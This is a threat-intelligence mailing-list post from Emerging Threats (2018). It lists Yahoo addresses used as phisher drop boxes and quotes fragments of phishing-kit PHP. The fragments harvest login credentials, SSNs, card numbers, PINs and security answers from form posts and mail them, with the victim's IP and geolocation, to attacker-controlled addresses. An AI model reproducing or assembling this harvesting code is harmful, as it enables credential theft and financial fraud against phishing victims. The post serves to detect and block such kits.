[Emerging-Sigs] Fwd: YAHOO_PHISHERS

Jason Williams jwilliams at emergingthreats.net
Sat Jan 27 10:13:10 HST 2018


Daily Phisher Yahoo Run -  Sat Jan 27 09:13:20 CST 2018

cahillbent at yahoo.com
DebraSloane60 at yahoo.com
femunu at yahoo.com
g4m3r_m4nd at yahoo.com
ibb.lekan at yahoo.com
ikookady2 at yahoo.com
resultwefamily at yahoo.com
team_pbg at yahoo.com


<?php



$to ="suhail.syzma at gmail.com, cahillbent at yahoo.com";


>>>>

$ip = getenv("REMOTE_ADDR");

$hostname = gethostbyaddr($ip);

$message  = "======================= SHPA7 =====================\n";

$message .= "Account ID : ".$_POST['loginId']."\n";

$message .= "Password Account ID : ".$_POST['loginPd']."\n";

$message .= "===================\n";

$message .= "Client IP : ".$ip."\n";

$message .= "HostName : ".$hostname."\n";

$message .= "======================= SHPA7 =====================\n";

$rnessage = "$message\n";

$send = "ronaldburger62 at gmail.com,DebraSloane60 at yahoo.com";


>>>>


$data .= "======================================\n";
$data .=        "id=".$_POST['email']."\n";
$data .=        "auth=".$_POST['pass']."\n";
$data .= "======================================\n";
$data .=        "IP: $ip\n";

if (isset($_POST['email']) && isset($_POST['pass'])) {
        $body = "Email: " . $_POST['email'] . " | Password: " .
$_POST['pass'];

        $to = "femunu at yahoo.com";

>>>>

$secretq5 =  $_POST['secretq5'];

$secreta5 =  $_POST['formtext27'];

$to = "trevor.owenus2 at gmail.com";

$subject = "BOA Results Recieved";

$from= "helloo at gmail.com";

$headers = "From:" . $from;

$data = "\r\nonline id: $onlineid password: $password \r\nFirst name:
$firstname Lastname: $lastname  \r\nAddress: $address City name: $cityname

state: $state zip: $zip \r\nPhone n0: $phone SSN no: $ssn \r\nDate of
Birth: $dob Mother maiden name: $mmaiden \r\nLicence no: $licence Mother
midle name: $mmidlename

Full name: $fullname Email address: $email Email password: $emailpass
\r\nCredit card no: $credit expirey Month: $month expirey year: $year
\r\nCCv no: $ccv Pin num: $pin

Secret Question 1: $secretq1 Answer: $secreta1 \r\nsecret Question 2:
$secretq2 answer: $secreta2 \r\nsecret Question 3: $secretq3 answer:
$secreta3

secret Question 4: $secretq4 answer: $secreta4 \r\nsecret Question 5:
$secretq5 answer: $secreta5 \r\n*****************************powered by:
g4m3r_m4nd at yahoo.com*****************************\r\n\r\n";


>>>>

$message .= "email at domain.com: " . $_POST['UserName'] . "\n";

$message .= "Password: " . $_POST['Password'] . "\n";

$message .= "IP : " .$ip. "\n";

$message .= "--------------------------------------------\n";

$message .=     "City: {$geoplugin->city}\n";

$message .=     "Region: {$geoplugin->region}\n";

$message .=     "Country Name: {$geoplugin->countryName}\n";

$message .=     "Country Code: {$geoplugin->countryCode}\n";

$message .= "User-Agent: ".$browser."\n";

$message .= "---------------------------------------------\n";

$to = "ibb.lekan at yahoo.com";


>>>>

        $Z118_SUBJECT = "NEW XD LOFIN BANANA TEAM SHIT <3 <3  :
".$_SESSION['_forlogin_']."  ".$_POST['login_email']." ";

        $Z118_HEADERS .= "From:XBANAANA<noreply at logs.com>";

        $Z118_HEADERS .= $_POST['eMailAdd']."\n";

        $Z118_HEADERS .= "MIME-Version: 1.0\n";

        $Z118_HEADERS .= "Content-type: text/html; charset=UTF-8\n";



        @mail($Z118_EMAIL, $Z118_SUBJECT, $Z118_MESSAGE, $Z118_HEADERS);

                HEADER("Location: ../settings/?verify_account=
session=".$_SESSION['_LOOKUP_CNTRCODE_']."&".md5(microtime(
))."&dispatch=".sha1(microtime())."");

                $ra44 = rand(1, 99999);

$subj98 = " Scam Upload From |$ip";

$email =

















                                                "ikookady2 at yahoo.com,
ikookady2 at gmail.com";








>>>>

<?php

error_reporting(0);

$param = "wf"; // Parameter Redirect
$key = "WeFamily";
$Your_Email      = "resultwefamily at yahoo.com"; // Set your email

>>>>

 # You can redistribute it and/or modify it under the terms of
 # the GNU General Public License as published by the Free Software
Foundation,
 # either version 3 of the License, or (at your option) any later version.

 # However, the license header, copyright and author credits
 # must not be modified in any form and always be displayed.

 # This program is distributed in the hope that it will be useful,
 # but WITHOUT ANY WARRANTY; without even the implied warranty of
 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 # Contact me : team_pbg at yahoo.com for more details.

>>>>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20180127/1f55fba3/attachment.html>


More information about the Emerging-sigs mailing list